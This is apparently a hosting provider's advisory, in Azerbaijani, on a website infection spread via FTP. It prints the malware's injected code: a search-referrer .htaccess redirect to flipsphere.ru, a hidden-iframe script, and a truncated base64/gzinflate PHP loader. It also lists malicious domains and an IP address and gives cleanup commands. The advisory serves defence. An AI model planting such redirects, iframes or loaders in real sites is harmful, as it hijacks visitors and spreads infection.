Bu yaxınlarda müştərilərimizdən birinin hesabları malware virusuna çox pis yaxalanmışdı. Bu virus hər yerdə yayqın omlağa başlayır və bu haqqda sizləridə bilgiləndirməyi unudmadıq. İlk olaraq deyimki bu virus öncə komputerinizə bulaşır və sonra ordan FTP ilə saytlarınıza transfer olur.. Bu sayyədə saytlarınızın bütün qovluqlarına htaccess açaraq içərsinə aşağdakı kodları yerləşdirir.
Kod:
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru).(.*)
RewriteRule ^(.*)$ http://flipsphere.ru/in.cgi?16 [R=301,L]
</IfModule>
#/c3284d#
Bununla bərabər bütün index, header, footer fayllarına iframe kodu yerləşdirərək saytınıza daxil olacaq bütün istifadəçilərədə yolxudmağa çalışır. Bunları təmizləmək çox uzun zaman alır. Əyər bir günlük backup varsa ən yaxşısı yoluxan müştərinin hesablarını bir gün öncəyə restore etməkdir..
Təhlükənin mənbəyi aşağdakı saytlardır.
Kod:
buzzcluster.ru
coderoute.ru
flipsphere.ru
scriptslimit.info
queriesresidents.info
gingermaster.ru
goldensmagnetics.com
torvaldscallthat.info
HTML CODE
Kod:
<!--c3284d--><script type="text/javascript">document.write('<iframe src="http://goldensmagnetic.com/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->
PHP CODE
Kod:
#c3284d#
echo(gzinflate(base64_decode("3U5LDoIwEN2TcIdmNuiGRhculOIlvEAtYxnTTkkZRG8vyC18q5eX91PqP9CMLtMgSj4DGhB8i37al91UaMuiS26K$
#/c3284d#
Domain flipsphere.ru is at: 95.211.26.184 (hosted-by.leaseweb.com)
Virusunu yonləndirdiyi url yolu : http://flipsphere.ru/in.cgi?16
Server sahibləri isə bu saytları root üzərindən aşağdakıları etmələri məsləhətdir.
Kod:
pico /etc/hosts
açılan faylda boş bir yerə şəkildə olduğu kimi qeyd etsinlər.
Bu 95.211.26.184 ip adresinidə firewall üzərindən block edin..
Ən son dəyişiklik edilmiş faylları görmək üçün aşağdakı əmiri vermək kifayətdir. (bu əmiri public_html directorunda verin)
Kod:
find . -mtime -2